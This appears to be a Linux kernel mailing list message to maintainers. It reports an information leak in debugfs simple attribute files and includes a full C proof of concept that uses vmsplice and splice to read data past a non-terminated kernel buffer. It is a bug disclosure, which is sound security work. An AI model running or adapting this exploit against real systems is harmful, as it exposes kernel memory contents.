Hi Greg, Rafael, Arnd,
> This report says it's uninit in strlen, but there's actually an
> information leak later on that lets the user read arbitrary data past
> the non-terminated attr->get_buf.
The attached PoC demonstrates the problem.
I am not sure how bad is that, given that /sys/kernel/debug is usually
accessible only to the root, and simple attribute files don't seem to
be used anywhere else.
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>
#define BUF_SIZE 128
int main(int argc, char *argv[])
{
char buf[BUF_SIZE];
const char def_filename[] = "/sys/kernel/debug/bluetooth/6lowpan_enable";
char *filename = (char *)def_filename;
int pipefd[2], dfs_fd;
struct iovec iov;
if (argc > 1)
filename = argv[1];
pipe(pipefd);
iov.iov_base = mmap(NULL, 0x1000, 3, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
iov.iov_len = 0x1;
vmsplice(pipefd[1], &iov, 1, 1);
dfs_fd = open(filename, O_RDWR);
splice(pipefd[0], 0, dfs_fd, 0, 0x1, SPLICE_F_NONBLOCK);
memset(buf, 0, BUF_SIZE);
read(dfs_fd, buf, BUF_SIZE);
printf("'%s'\n", buf);
return 0;
}
